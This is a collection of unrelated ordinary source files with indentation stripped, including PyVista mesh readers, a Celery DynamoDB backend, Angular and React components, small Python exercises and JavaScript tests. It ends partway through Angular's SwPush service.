# '.pdb': vtk.vtkPDBReader, # Contains `atom_types` which are note supported?
'.p3d': vtk.vtkPlot3DMetaReader,
'.pts': vtk.vtkPTSReader,
# '.particles': vtk.vtkParticleReader, # TODO: not tested
#TODO: '.pht': vtk.vtkPhasta??????,
#TODO: '.vpc': vtk.vtkVPIC?????,
# '.bin': vtk.vtkMultiBlockPLOT3DReader,# TODO: non-default routine
'.tri': vtk.vtkMCubesReader,
'.inp': vtk.vtkAVSucdReader,
}
VTK_MAJOR = vtk.vtkVersion().GetVTKMajorVersion()
VTK_MINOR = vtk.vtkVersion().GetVTKMinorVersion()
if (VTK_MAJOR >= 8 and VTK_MINOR >= 2):
try:
READERS['.sgy'] = vtk.vtkSegYReader
READERS['.segy'] = vtk.vtkSegYReader
except AttributeError:
pass
def get_ext(filename):
"""Extract the extension of the filename."""
ext = os.path.splitext(filename)[1].lower()
return ext
def get_reader(filename):
"""Get the corresponding reader based on file extension and instantiates it."""
ext = get_ext(filename)
return READERS[ext]() # Get and instantiate the reader
def set_vtkwriter_mode(vtk_writer, use_binary=True):
"""Set any vtk writer to write as binary or ascii."""
if isinstance(vtk_writer, (vtk.vtkDataWriter, vtk.vtkPLYWriter, vtk.vtkSTLWriter)):
if use_binary:
vtk_writer.SetFileTypeToBinary()
else:
vtk_writer.SetFileTypeToASCII()
elif isinstance(vtk_writer, vtk.vtkXMLWriter):
if use_binary:
vtk_writer.SetDataModeToBinary()
else:
vtk_writer.SetDataModeToAscii()
return vtk_writer
def standard_reader_routine(reader, filename, attrs=None):
"""Use a given reader in the common VTK reading pipeline routine.
The reader must come from the ``READERS`` mapping.
Parameters
----------
reader : vtkReader
Any instantiated VTK reader class
filename : str
The string filename to the data file to read.
attrs : dict, optional
A dictionary of attributes to call on the reader. Keys of dictionary are
the attribute/method names and values are the arguments passed to those
calls. If you do not have any attributes to call, pass ``None`` as the
value.
"""
if attrs is None:
attrs = {}
if not isinstance(attrs, dict):
raise TypeError('Attributes must be a dictionary of name and arguments.')
if filename is not None:
reader.SetFileName(filename)
# Apply any attributes listed
for name, args in attrs.items():
attr = getattr(reader, name)
if args is not None:
if not isinstance(args, (list, tuple)):
args = [args]
attr(*args)
else:
attr()
# Perform the read
reader.Update()
return pyvista.wrap(reader.GetOutputDataObject(0))
def read_legacy(filename):
"""Use VTK's legacy reader to read a file."""
reader = vtk.vtkDataSetReader()
reader.SetFileName(filename)
# Ensure all data is fetched with poorly formatted legacy files
reader.ReadAllScalarsOn()
reader.ReadAllColorScalarsOn()
reader.ReadAllNormalsOn()
reader.ReadAllTCoordsOn()
reader.ReadAllVectorsOn()
# Perform the read
output = standard_reader_routine(reader, None)
if output is None:
raise RuntimeError('No output when using VTKs legacy reader')
return output
def read(filename, attrs=None, file_format=None):
"""Read any VTK file.
It will figure out what reader to use then wrap the VTK object for
use in PyVista.
Parameters
----------
filename : str
The string path to the file to read. If a list of files is
given, a :class:`pyvista.MultiBlock` dataset is returned with
each file being a separate block in the dataset.
attrs : dict, optional
A dictionary of attributes to call on the reader. Keys of
dictionary are the attribute/method names and values are the
arguments passed to those calls. If you do not have any
attributes to call, pass ``None`` as the value.
file_format : str, optional
Format of file to read with meshio.
Examples
--------
Load an example mesh
>>> import pyvista
>>> from pyvista import examples
>>> mesh = pyvista.read(examples.antfile)
Load a vtk file
>>> mesh = pyvista.read('my_mesh.vtk') # doctest:+SKIP
Load a meshio file
>>> mesh = pyvista.read("mesh.obj") # doctest:+SKIP
"""
if isinstance(filename, (list, tuple)):
multi = pyvista.MultiBlock()
for each in filename:
if isinstance(each, (str, pathlib.Path)):
name = os.path.basename(str(each))
else:
name = None
multi[-1, name] = read(each, attrs=attrs,
file_format=file_format)
return multi
filename = os.path.abspath(os.path.expanduser(str(filename)))
if not os.path.isfile(filename):
raise FileNotFoundError(f'File ({filename}) not found')
ext = get_ext(filename)
# Read file using meshio.read if file_format is present
if file_format:
return read_meshio(filename, file_format)
# From the extension, decide which reader to use
if attrs is not None:
reader = get_reader(filename)
return standard_reader_routine(reader, filename, attrs=attrs)
elif ext in '.vti': # ImageData
return pyvista.UniformGrid(filename)
elif ext in '.vtr': # RectilinearGrid
return pyvista.RectilinearGrid(filename)
elif ext in '.vtu': # UnstructuredGrid
return pyvista.UnstructuredGrid(filename)
elif ext in ['.ply', '.obj', '.stl']: # PolyData
return pyvista.PolyData(filename)
elif ext in '.vts': # StructuredGrid
return pyvista.StructuredGrid(filename)
elif ext in ['.vtm', '.vtmb', '.case']:
return pyvista.MultiBlock(filename)
elif ext in ['.e', '.exo']:
return read_exodus(filename)
elif ext in ['.vtk']:
# Attempt to use the legacy reader...
return read_legacy(filename)
elif ext in ['.jpeg', '.jpg']:
return pyvista.Texture(filename).to_image()
else:
# Attempt find a reader in the readers mapping
try:
reader = get_reader(filename)
return standard_reader_routine(reader, filename)
except KeyError:
# Attempt read with meshio
try:
from meshio._exceptions import ReadError
try:
return read_meshio(filename)
except ReadError:
pass
except SyntaxError:
# https://github.com/pyvista/pyvista/pull/495
pass
raise IOError("This file was not able to be automatically read by pyvista.")
def read_texture(filename, attrs=None):
"""Load a ``vtkTexture`` from an image file."""
filename = os.path.abspath(os.path.expanduser(filename))
try:
# initialize the reader using the extension to find it
reader = get_reader(filename)
image = standard_reader_routine(reader, filename, attrs=attrs)
if image.n_points < 2:
raise ValueError("Problem reading the image with VTK.")
return pyvista.Texture(image)
except (KeyError, ValueError):
# Otherwise, use the imageio reader
pass
import imageio
return pyvista.Texture(imageio.imread(filename))
def read_exodus(filename,
animate_mode_shapes=True,
apply_displacements=True,
displacement_magnitude=1.0,
enabled_sidesets=None):
"""Read an ExodusII file (``'.e'`` or ``'.exo'``)."""
reader = vtk.vtkExodusIIReader()
reader.SetFileName(filename)
reader.UpdateInformation()
reader.SetAnimateModeShapes(animate_mode_shapes)
reader.SetApplyDisplacements(apply_displacements)
reader.SetDisplacementMagnitude(displacement_magnitude)
if enabled_sidesets is None:
enabled_sidesets = list(range(reader.GetNumberOfSideSetArrays()))
for sideset in enabled_sidesets:
if isinstance(sideset, int):
name = reader.GetSideSetArrayName(sideset)
elif isinstance(sideset, str):
name = sideset
else:
raise ValueError(f'Could not parse sideset ID/name: {sideset}')
reader.SetSideSetArrayStatus(name, 1)
reader.Update()
return pyvista.wrap(reader.GetOutput())
def read_plot3d(filename, q_filenames=(), auto_detect=True, attrs=None):
"""Read a Plot3D grid file (e.g., grid.in) and optional q file(s).
Parameters
----------
filename : str
The string filename to the data file to read.
q_filenames : str or tuple(str), optional
The string filename of the q-file, or iterable of such filenames.
auto_detect : bool, optional
When this option is turned on, the reader will try to figure out the
values of various options such as byte order, byte count etc. Default is
True.
attrs : dict, optional
A dictionary of attributes to call on the reader. Keys of dictionary are
the attribute/method names and values are the arguments passed to those
calls. If you do not have any attributes to call, pass ``None`` as the
value.
Returns
-------
mesh : pyvista.MultiBlock
Data read from the file.
"""
filename = _process_filename(filename)
reader = vtk.vtkMultiBlockPLOT3DReader()
reader.SetFileName(filename)
# q_filenames may be a list or a single filename
if q_filenames:
if isinstance(q_filenames, (str, pathlib.Path)):
q_filenames = [q_filenames]
q_filenames = [_process_filename(f) for f in q_filenames]
if hasattr(reader, 'AddFileName'):
# AddFileName was added to vtkMultiBlockPLOT3DReader sometime around
# VTK 8.2. This method supports reading multiple q files.
for q_filename in q_filenames:
reader.AddFileName(q_filename)
else:
# SetQFileName is used to add a single q file to be read, and is still
# supported in VTK9.
if len(q_filenames) > 0:
if len(q_filenames) > 1:
raise RuntimeError('Reading of multiple q files is not supported '
'with this version of VTK.')
reader.SetQFileName(q_filenames[0])
attrs = {} if not attrs else attrs
attrs['SetAutoDetectFormat'] = auto_detect
return standard_reader_routine(reader, filename=None, attrs=attrs)
def from_meshio(mesh):
"""Convert a ``meshio`` mesh instance to a PyVista mesh."""
from meshio.vtk._vtk import (
meshio_to_vtk_type,
vtk_type_to_numnodes,
)
# Extract cells from meshio.Mesh object
offset = []
cells = []
cell_type = []
next_offset = 0
for c in mesh.cells:
vtk_type = meshio_to_vtk_type[c.type]
numnodes = vtk_type_to_numnodes[vtk_type]
cells.append(
np.hstack((np.full((len(c.data), 1), numnodes), c.data)).ravel()
)
cell_type += [vtk_type] * len(c.data)
if not VTK9:
offset += [next_offset + i * (numnodes + 1) for i in range(len(c.data))]
next_offset = offset[-1] + numnodes + 1
# Extract cell data from meshio.Mesh object
cell_data = {k: np.concatenate(v) for k, v in mesh.cell_data.items()}
# Create pyvista.UnstructuredGrid object
points = mesh.points
if points.shape[1] == 2:
points = np.hstack((points, np.zeros((len(points), 1))))
if VTK9:
grid = pyvista.UnstructuredGrid(
np.concatenate(cells),
np.array(cell_type),
np.array(points, np.float64),
)
else:
grid = pyvista.UnstructuredGrid(
np.array(offset),
np.concatenate(cells),
np.array(cell_type),
np.array(points, np.float64),
)
# Set point data
grid.point_arrays.update({k: np.array(v, np.float64) for k, v in mesh.point_data.items()})
# Set cell data
grid.cell_arrays.update(cell_data)
return grid
def read_meshio(filename, file_format=None):
"""Read any mesh file using meshio."""
import meshio
# Make sure relative paths will work
filename = os.path.abspath(os.path.expanduser(str(filename)))
# Read mesh file
mesh = meshio.read(filename, file_format)
return from_meshio(mesh)
def save_meshio(filename, mesh, file_format = None, **kwargs):
"""Save mesh to file using meshio.
Parameters
----------
mesh : pyvista.Common
Any PyVista mesh/spatial data type.
file_format : str
File type for meshio to save.
"""
import meshio
from meshio.vtk._vtk import vtk_to_meshio_type
# Make sure relative paths will work
filename = os.path.abspath(os.path.expanduser(str(filename)))
# Cast to pyvista.UnstructuredGrid
if not isinstance(mesh, pyvista.UnstructuredGrid):
mesh = mesh.cast_to_unstructured_grid()
# Copy useful arrays to avoid repeated calls to properties
vtk_offset = mesh.offset
vtk_cells = mesh.cells
vtk_cell_type = mesh.celltypes
# Check that meshio supports all cell types in input mesh
pixel_voxel = {8, 11} # Handle pixels and voxels
for cell_type in np.unique(vtk_cell_type):
if cell_type not in vtk_to_meshio_type.keys() and cell_type not in pixel_voxel:
raise TypeError(f"meshio does not support VTK type {cell_type}.")
# Get cells
cells = []
c = 0
for offset, cell_type in zip(vtk_offset, vtk_cell_type):
numnodes = vtk_cells[offset+c]
if VTK9: # must offset by cell count
cell = vtk_cells[offset+1+c:offset+1+c+numnodes]
c += 1
else:
cell = vtk_cells[offset+1:offset+1+numnodes]
cell = (
cell if cell_type not in pixel_voxel
else cell[[0, 1, 3, 2]] if cell_type == 8
else cell[[0, 1, 3, 2, 4, 5, 7, 6]]
)
cell_type = cell_type if cell_type not in pixel_voxel else cell_type+1
cell_type = (
vtk_to_meshio_type[cell_type] if cell_type != 7
else f"polygon{numnodes}"
)
if len(cells) > 0 and cells[-1][0] == cell_type:
cells[-1][1].append(cell)
else:
cells.append((cell_type, [cell]))
for k, c in enumerate(cells):
cells[k] = (c[0], np.array(c[1]))
# Get point data
point_data = {k.replace(" ", "_"): v for k, v in mesh.point_arrays.items()}
# Get cell data
vtk_cell_data = mesh.cell_arrays
n_cells = np.cumsum([len(c[1]) for c in cells[:-1]])
cell_data = (
{k.replace(" ", "_"): np.split(v, n_cells) for k, v in vtk_cell_data.items()}
if vtk_cell_data
else {}
)
# Save using meshio
meshio.write_points_cells(
filename=filename,
points=np.array(mesh.points),
cells=cells,
point_data=point_data,
cell_data=cell_data,
file_format=file_format,
**kwargs
)
def _process_filename(filename):
return os.path.abspath(os.path.expanduser(str(filename)))
|
'''
[Hard]This problem was asked by Amazon.
There exists a staircase with N steps, and you can climb up either
1 or 2 steps at a time. Given N, write a function that returns the
number of unique ways you can climb the staircase. The order of the
steps matters.
For example, if N is 4, then there are 5 unique ways:
1, 1, 1, 1
2, 1, 1
1, 2, 1
1, 1, 2
2, 2
What if, instead of being able to climb 1 or 2 steps at a time, you
could climb any number from a set of positive integers X?
For example, if X = {1, 3, 5}, you could climb 1, 3, or 5 steps at
a time.
'''
#This time the topic is similar to the content of Daily Coding
#Problem #7, so change the code of Daily Coding Problem #7 and use
#it.
steps=[]
def function1(n,s):
if n==1:
steps.append(s+"1")
return
else:
function1(n-1,s+"1")
if n==2:
steps.append(s+"2")
else:
function1(n-2,s+"2")
function1(7,"")
print("Steps:",len(steps))
print(steps)
#The second requirement is equivalent to finding regularities in function1.
steps=[]
arr=[1,3,5]
def function2(n,s):
for i in arr:
if n==i:
steps.append(s+str(i))
elif i<n:
function2(n-i,s+str(i))
function2(7,"")
print("Steps:",len(steps))
print(steps)
|
describe('[Regression](GH-423)', function () {
it('Should raise click event except in Firefox if target element appends child after mousedown', function () {
return runTests('testcafe-fixtures/index.test.js', 'Raise click if target appends child', { skip: ['firefox', 'firefox-osx'] });
});
it("Shouldn't raise click event in Firefox if target element appends child after mousedown", function () {
return runTests('testcafe-fixtures/index.test.js', "Don't raise click if target element appends child", { only: ['firefox', 'firefox-osx'] });
});
it("Shouldn't not raise click if target is overlapped", function () {
return runTests('testcafe-fixtures/index.test.js', "Don't raise click if target is overlapped");
});
it("Should raise click event in Firefox if target's parent has been changed after mousedown", function () {
return runTests('testcafe-fixtures/index.test.js', 'Raise click if target parent changed', { only: ['firefox', 'firefox-osx'] });
});
it("Shouldn't raise click event except in Firefox if target's parent has been changed after mousedown", function () {
return runTests('testcafe-fixtures/index.test.js', "Don't raise click if target parent changed", { skip: ['firefox', 'firefox-osx'] });
});
it("Shouldn't raise click if target appends editable form element", function () {
return runTests('testcafe-fixtures/index.test.js', "Don't raise click event if target appends input element");
});
});
|
import React, {useContext} from 'react';
import {Context} from '../context';
import "./sidePanel.css";
export default function ListContainer(){
const {setList, filterResults, fetchListUsers} = useContext(Context);
const handleClick = (list) => {
setList(list);
fetchListUsers(list);
}
if (filterResults.length > 0) {
return(
<div className="list_container" id='scrollbar' >
{filterResults.map((list) => {
return(
<div className="list_name" key={list.id} onClick={() => handleClick(list)}>
<h3 key={list.id} id={list.id}>{list.list_name}</h3>
</div>
)
})}
</div>
)
} else {
return(
<div className="list_container">
<span>¯\_(ツ)_/¯</span>
<p>No lists could be found</p>
</div>
);
}
}
|
"非同期でやらせたいタスク"
import time
def handle(event, context):
print("name = %s" % event['name'])
time.sleep(5)
return "Success"
|
angular.module('angularResizable', [])
.directive('resizable', function ($document, $timeout, $window) {
var toCall;
function throttle(fun) {
if (!toCall) {
toCall = fun;
$timeout(function () {
toCall();
toCall = null;
}, 100);
} else {
toCall = fun;
}
}
return {
restrict: 'A',
scope: {
rDirections: '=',
rGrabber : '@'
},
link: function ($scope, $element) {
$element.addClass('resizable');
var style = $window.getComputedStyle($element[0], null);
var size;
var axis;
var start;
var dir;
var info = {};
var updateInfo = function () {
var parameter = axis === 'x' ? 'width' : 'height';
info.width = false;
info.height = false;
info.id = $element[0].id;
info[parameter] = parseInt($element[0].style[parameter], 10);
};
var createGrabbers = function () {
var inner = $scope.rGrabber || '<span></span>';
$scope.rDirections.forEach(function (direction) {
var grabber = $document[0].createElement('div');
// add class for styling purposes
grabber.setAttribute('class', 'rg-' + direction);
grabber.innerHTML = inner;
$element[0].appendChild(grabber);
grabber.ondragstart = function () { return false; };
grabber.addEventListener('mousedown', dragStart.bind(null, direction), false);
});
};
var dragging = function (event) {
var offset = start - (axis === 'x' ? event.clientX : event.clientY);
$element[0].style[axis === 'x' ? 'width' : 'height'] = size + offset * dir + 'px';
updateInfo();
throttle(function () {
$scope.$emit('angular-resizable.resizing', info);
});
};
var dragEnd = function () {
updateInfo();
$scope.$emit('angular-resizable.resizeEnd', info);
$scope.$apply();
$document[0].removeEventListener('mouseup', dragEnd, false);
$document[0].removeEventListener('mousemove', dragging, false);
$element.removeClass('no-transition');
};
var dragStart = function (direction, event) {
axis = direction === 'left' || direction === 'right' ? 'x' : 'y';
dir = direction === 'bottom' || direction === 'right' ? -1 : 1;
start = axis === 'x' ? event.clientX : event.clientY;
size = parseInt(style.getPropertyValue(axis === 'x' ? 'width' : 'height'), 10);
//prevent transition while dragging
$element.addClass('no-transition');
$document[0].addEventListener('mouseup', dragEnd, false);
$document[0].addEventListener('mousemove', dragging, false);
// Disable highlighting while dragging
if (event.stopPropagation) { event.stopPropagation(); }
if (event.preventDefault) { event.preventDefault(); }
event.cancelBubble = true;
event.returnValue = false;
updateInfo();
$scope.$emit('angular-resizable.resizeStart', info);
$scope.$apply();
};
createGrabbers();
}
};
});
|
#!/usr/bin/env python
def print_banner(s):
print('##------------------------------------------------------------------------------')
print(f'## {s}')
print('##------------------------------------------------------------------------------')
class Car:
def __init__(self, color, mileage):
self.color = color
self.mileage = mileage
print_banner('User class without __str__ or __repr__')
my_car = Car('red', 37281)
print(my_car)
class Car:
def __init__(self, color, mileage):
self.color = color
self.mileage = mileage
def __str__(self):
return f'a {self.color} car'
print_banner('User class with __str__')
my_car = Car('red', 37281)
print(my_car)
print_banner('Converting to string with str() method')
print(str(my_car))
print_banner('Converting to string with \'{}\'.format method')
print('{}'.format(my_car))
print_banner('Compare between __str__ and __repr__')
class Car:
def __init__(self, color, mileage):
self.color = color
self.mileage = mileage
def __str__(self):
return f'__str__ for Car'
def __repr__(self):
return f'__repr__ for Car'
my_car = Car('red', 37281)
print(my_car)
print('{}'.format(my_car))
print('__repr__ will be called if you are in an interactive session')
print(str([my_car]))
print(str(my_car))
print(repr(my_car))
import datetime
today = datetime.date.today()
print(str(today))
print(repr(today))
print(type(today))
print_banner('Redefine __repr__ with don\'t repeat yourself approach')
class Car:
def __init__(self, color, mileage):
self.color = color
self.mileage = mileage
def __repr__(self):
return (f'{self.__class__.__name__}('
f'{self.color!r}, {self.mileage!r})')
my_car = Car('red', 37281)
print(my_car)
|
load("bf4b12814bc95f34eeb130127d8438ab.js");
load("93fae755edd261212639eed30afa2ca4.js");
load("9943750f07ea537be5f5aa14a5f7b1b7.js");
// Copyright (C) 2015 the V8 project authors. All rights reserved.
// This code is governed by the BSD license found in the LICENSE file.
/*---
es6id: 21.2.5.8
description: RegExp.prototype[Symbol.replace] `length` property
info: >
ES6 Section 17:
Every built-in Function object, including constructors, has a length
property whose value is an integer. Unless otherwise specified, this value
is equal to the largest number of named arguments shown in the subclause
headings for the function description, including optional parameters.
[...]
Unless otherwise specified, the length property of a built-in Function
object has the attributes { [[Writable]]: false, [[Enumerable]]: false,
[[Configurable]]: true }.
includes: [propertyHelper.js]
---*/
assert.sameValue(RegExp.prototype[Symbol.replace].length, 2);
verifyNotEnumerable(RegExp.prototype[Symbol.replace], 'length');
verifyNotWritable(RegExp.prototype[Symbol.replace], 'length');
verifyConfigurable(RegExp.prototype[Symbol.replace], 'length');
|
# -*- coding: utf-8 -*-
"""AWS DynamoDB result store backend."""
from __future__ import absolute_import, unicode_literals
from collections import namedtuple
from time import sleep, time
from kombu.utils.url import _parse_url as parse_url
from celery.exceptions import ImproperlyConfigured
from celery.five import string
from celery.utils.log import get_logger
from .base import KeyValueStoreBackend
try:
import boto3
from botocore.exceptions import ClientError
except ImportError: # pragma: no cover
boto3 = ClientError = None # noqa
__all__ = ('DynamoDBBackend',)
# Helper class that describes a DynamoDB attribute
DynamoDBAttribute = namedtuple('DynamoDBAttribute', ('name', 'data_type'))
logger = get_logger(__name__)
class DynamoDBBackend(KeyValueStoreBackend):
"""AWS DynamoDB result backend.
Raises:
celery.exceptions.ImproperlyConfigured:
if module :pypi:`boto3` is not available.
"""
#: default DynamoDB table name (`default`)
table_name = 'celery'
#: Read Provisioned Throughput (`default`)
read_capacity_units = 1
#: Write Provisioned Throughput (`default`)
write_capacity_units = 1
#: AWS region (`default`)
aws_region = None
#: The endpoint URL that is passed to boto3 (local DynamoDB) (`default`)
endpoint_url = None
_key_field = DynamoDBAttribute(name='id', data_type='S')
_value_field = DynamoDBAttribute(name='result', data_type='B')
_timestamp_field = DynamoDBAttribute(name='timestamp', data_type='N')
_available_fields = None
def __init__(self, url=None, table_name=None, *args, **kwargs):
super(DynamoDBBackend, self).__init__(*args, **kwargs)
self.url = url
self.table_name = table_name or self.table_name
if not boto3:
raise ImproperlyConfigured(
'You need to install the boto3 library to use the '
'DynamoDB backend.')
aws_credentials_given = False
aws_access_key_id = None
aws_secret_access_key = None
if url is not None:
scheme, region, port, username, password, table, query = \
parse_url(url)
aws_access_key_id = username
aws_secret_access_key = password
access_key_given = aws_access_key_id is not None
secret_key_given = aws_secret_access_key is not None
if access_key_given != secret_key_given:
raise ImproperlyConfigured(
'You need to specify both the Access Key ID '
'and Secret.')
aws_credentials_given = access_key_given
if region == 'localhost':
# We are using the downloadable, local version of DynamoDB
self.endpoint_url = 'http://localhost:{}'.format(port)
self.aws_region = 'us-east-1'
logger.warning(
'Using local-only DynamoDB endpoint URL: {}'.format(
self.endpoint_url
)
)
else:
self.aws_region = region
# If endpoint_url is explicitly set use it instead
_get = self.app.conf.get
config_endpoint_url = _get('dynamodb_endpoint_url')
if config_endpoint_url:
self.endpoint_url = config_endpoint_url
self.read_capacity_units = int(
query.get(
'read',
self.read_capacity_units
)
)
self.write_capacity_units = int(
query.get(
'write',
self.write_capacity_units
)
)
self.table_name = table or self.table_name
self._available_fields = (
self._key_field,
self._value_field,
self._timestamp_field
)
self._client = None
if aws_credentials_given:
self._get_client(
access_key_id=aws_access_key_id,
secret_access_key=aws_secret_access_key
)
def _get_client(self, access_key_id=None, secret_access_key=None):
"""Get client connection."""
if self._client is None:
client_parameters = {
'region_name': self.aws_region
}
if access_key_id is not None:
client_parameters.update({
'aws_access_key_id': access_key_id,
'aws_secret_access_key': secret_access_key
})
if self.endpoint_url is not None:
client_parameters['endpoint_url'] = self.endpoint_url
self._client = boto3.client(
'dynamodb',
**client_parameters
)
self._get_or_create_table()
return self._client
def _get_table_schema(self):
"""Get the boto3 structure describing the DynamoDB table schema."""
return {
'AttributeDefinitions': [
{
'AttributeName': self._key_field.name,
'AttributeType': self._key_field.data_type
}
],
'TableName': self.table_name,
'KeySchema': [
{
'AttributeName': self._key_field.name,
'KeyType': 'HASH'
}
],
'ProvisionedThroughput': {
'ReadCapacityUnits': self.read_capacity_units,
'WriteCapacityUnits': self.write_capacity_units
}
}
def _get_or_create_table(self):
"""Create table if not exists, otherwise return the description."""
table_schema = self._get_table_schema()
try:
table_description = self._client.create_table(**table_schema)
logger.info(
'DynamoDB Table {} did not exist, creating.'.format(
self.table_name
)
)
# In case we created the table, wait until it becomes available.
self._wait_for_table_status('ACTIVE')
logger.info(
'DynamoDB Table {} is now available.'.format(
self.table_name
)
)
return table_description
except ClientError as e:
error_code = e.response['Error'].get('Code', 'Unknown')
# If table exists, do not fail, just return the description.
if error_code == 'ResourceInUseException':
return self._client.describe_table(
TableName=self.table_name
)
else:
raise e
def _wait_for_table_status(self, expected='ACTIVE'):
"""Poll for the expected table status."""
achieved_state = False
while not achieved_state:
table_description = self.client.describe_table(
TableName=self.table_name
)
logger.debug(
'Waiting for DynamoDB table {} to become {}.'.format(
self.table_name,
expected
)
)
current_status = table_description['Table']['TableStatus']
achieved_state = current_status == expected
sleep(1)
def _prepare_get_request(self, key):
"""Construct the item retrieval request parameters."""
return {
'TableName': self.table_name,
'Key': {
self._key_field.name: {
self._key_field.data_type: key
}
}
}
def _prepare_put_request(self, key, value):
"""Construct the item creation request parameters."""
return {
'TableName': self.table_name,
'Item': {
self._key_field.name: {
self._key_field.data_type: key
},
self._value_field.name: {
self._value_field.data_type: value
},
self._timestamp_field.name: {
self._timestamp_field.data_type: str(time())
}
}
}
def _item_to_dict(self, raw_response):
"""Convert get_item() response to field-value pairs."""
if 'Item' not in raw_response:
return {}
return {
field.name: raw_response['Item'][field.name][field.data_type]
for field in self._available_fields
}
@property
def client(self):
return self._get_client()
def get(self, key):
key = string(key)
request_parameters = self._prepare_get_request(key)
item_response = self.client.get_item(**request_parameters)
item = self._item_to_dict(item_response)
return item.get(self._value_field.name)
def set(self, key, value):
key = string(key)
request_parameters = self._prepare_put_request(key, value)
self.client.put_item(**request_parameters)
def mget(self, keys):
return [self.get(key) for key in keys]
def delete(self, key):
key = string(key)
request_parameters = self._prepare_get_request(key)
self.client.delete_item(**request_parameters)
|
/*
* This header is generated by classdump-dyld 1.5
* on Friday, April 30, 2021 at 11:34:24 AM Mountain Standard Time
* Operating System: Version 13.5.1 (Build 17F80)
* Image Source: /System/Library/Frameworks/CoreML.framework/CoreML
* classdump-dyld is licensed under GPLv3, Copyright © 2013-2016 by Elias Limneos. Updated by Kevin Bradley.
*/
#import <libobjc.A.dylib/EspressoBrick.h>
@class NSArray, NSString;
@interface MLAddBroadcastableBrick : NSObject <EspressoBrick> {
BOOL _shapeInfoNeeded;
NSArray* _inputRanks;
NSArray* _outputRanks;
NSArray* _inputShapes;
NSArray* _outputShapes;
}
@property (nonatomic,readonly) BOOL shapeInfoNeeded; //@synthesize shapeInfoNeeded=_shapeInfoNeeded - In the implementation block
@property (nonatomic,readonly) NSArray * inputRanks; //@synthesize inputRanks=_inputRanks - In the implementation block
@property (nonatomic,readonly) NSArray * outputRanks; //@synthesize outputRanks=_outputRanks - In the implementation block
@property (nonatomic,readonly) NSArray * inputShapes; //@synthesize inputShapes=_inputShapes - In the implementation block
@property (nonatomic,readonly) NSArray * outputShapes; //@synthesize outputShapes=_outputShapes - In the implementation block
@property (readonly) unsigned long long hash;
@property (readonly) Class superclass;
@property (copy,readonly) NSString * description;
@property (copy,readonly) NSString * debugDescription;
-(id)initWithParameters:(id)arg1 ;
-(void)computeOnCPUWithInputTensors:(id)arg1 outputTensors:(id)arg2 ;
-(id)setupForInputShapes:(id)arg1 withParameters:(id)arg2 ;
-(BOOL)hasGPUSupport;
-(BOOL)shapeInfoNeeded;
-(NSArray *)inputRanks;
-(NSArray *)outputRanks;
-(NSArray *)inputShapes;
-(NSArray *)outputShapes;
@end
|
# Exercicio 4
# importando itemgetter
from operator import itemgetter
dicionario = {}
lista = []
print('-' * 30)
print('Cadastro de Produtos')
print('-' * 30)
while True:
# Entrada codigo.
codigo = int(input('Digite o código do produto:(0 para sair): '))
if codigo == 0:
break
# Entrada estoque.
estoque = int(input('Digite a quantidade em estoque: '))
# Entrada mínimo
minimo = int(input('Digite a quantidade mínima: '))
# adicionando no dicionario
dicionario['codigo'] = codigo
dicionario['estoque'] = estoque
dicionario['minimo'] = minimo
# copiando do dicionario para a lista.
lista.append(dicionario.copy())
print('-' * 40)
# colocando a lista em ordem.
listaordenada = sorted(lista, key=itemgetter('codigo'))
print(' Código | Estoque | Mínimo ')
# print da lista ordenada.
for p in listaordenada:
print(str(p['codigo']).center(13), end='')
print(str(p['estoque']).center(13), end='')
print(str(p['minimo']).center(13))
print('-' * 40)
print('Fim.')
|
from django.urls import path, include
from rest_framework_nested import routers
from .views import EventViewSet, CommentViewSet, FeedViewSet
router = routers.SimpleRouter()
router.register('events', EventViewSet)
router.register('feed', FeedViewSet)
event_router = routers.NestedSimpleRouter(router, 'events', lookup='event')
event_router.register('comments', CommentViewSet, base_name='event-comments')
urlpatterns = [
path('', include(router.urls)),
path('', include(event_router.urls)),
]
|
/**
* @fileoverview added by tsickle
* @suppress {checkTypes,constantProperty,extraRequire,missingOverride,missingReturn,unusedPrivateMembers,uselessCode} checked by tsc
*/
/**
* @license
* Copyright Google Inc. All Rights Reserved.
*
* Use of this source code is governed by an MIT-style license that can be
* found in the LICENSE file at https://angular.io/license
*/
import { Injectable } from '@angular/core';
import { NEVER, Subject, merge } from 'rxjs';
import { map, switchMap, take } from 'rxjs/operators';
import { ERR_SW_NOT_SUPPORTED, NgswCommChannel } from './low_level';
/**
* Subscribe and listen to push notifications from the Service Worker.
*
* \@publicApi
*/
import * as ɵngcc0 from '@angular/core';
export class SwPush {
/**
* @param {?} sw
*/
constructor(sw) {
this.sw = sw;
this.subscriptionChanges = new Subject();
if (!sw.isEnabled) {
this.messages = NEVER;
this.notificationClicks = NEVER;
this.subscription = NEVER;
return;
}
this.messages = this.sw.eventsOfType('PUSH').pipe(map((/**
* @param {?} message
* @return {?}
*/
message => message.data)));
this.notificationClicks =
this.sw.eventsOfType('NOTIFICATION_CLICK').pipe(map((/**
* @param {?} message
* @return {?}
*/
(message) => message.data)));
this.pushManager = this.sw.registration.pipe(map((/**
* @param {?} registration
* @return {?}
*/
registration => registration.pushManager)));
/** @type {?} */
const workerDrivenSubscriptions = this.pushManager.pipe(switchMap((/**
* @param {?} pm
* @return {?}
*/
pm => pm.getSubscription())));
this.subscription = merge(workerDrivenSubscriptions, this.subscriptionChanges);
}
/**
* True if the Service Worker is enabled (supported by the browser and enabled via
* `ServiceWorkerModule`).
* @return {?}
*/
get isEnabled() { return this.sw.isEnabled; }
/**
* @param {?} options
* @return {?}
*/
requestSubscription(options) {
if (!this.sw.isEnabled) {
return Promise.reject(new Error(ERR_SW_NOT_SUPPORTED));
}
/** @type {?} */
const pushOptions = { userVisibleOnly: true };
/** @type {?} */
let key = this.decodeBase64(options.serverPublicKey.replace(/_/g, '/').replace(/-/g, '+'));
/** @type {?} */
let applicationServerKey = new Uint8Array(new ArrayBuffer(key.length));
for (let i = 0; i < key.length; i++) {
applicationServerKey[i] = key.charCodeAt(i);
}
pushOptions.applicationServerKey = applicationServerKey;
return this.pushManager.pipe(switchMap((/**
* @param {?} pm
* @return {?}
*/
pm => pm.subscribe(pushOptions))), take(1))
.toPromise()
.then((/**
* @param {?} sub
* @return {?}
*/
sub => {
this.subscriptionChanges.next(sub);
return sub;
}));
}
/**
* @return {?}
*/
unsubscribe() {
if (!this.sw.isEnabled) {
return Promise.reject(new Error(ERR_SW_NOT_SUPPORTED));
}
/** @type {?} */
const doUnsubscribe = (/**
* @param {?} sub
* @return {?}
*/
(sub) => {
if (sub === null) {
throw new Error('Not subscribed to push notifications.');
}
return sub.unsubscribe().then((/**
* @param {?} success
* @return {?}
*/
success => {
if (!success) {
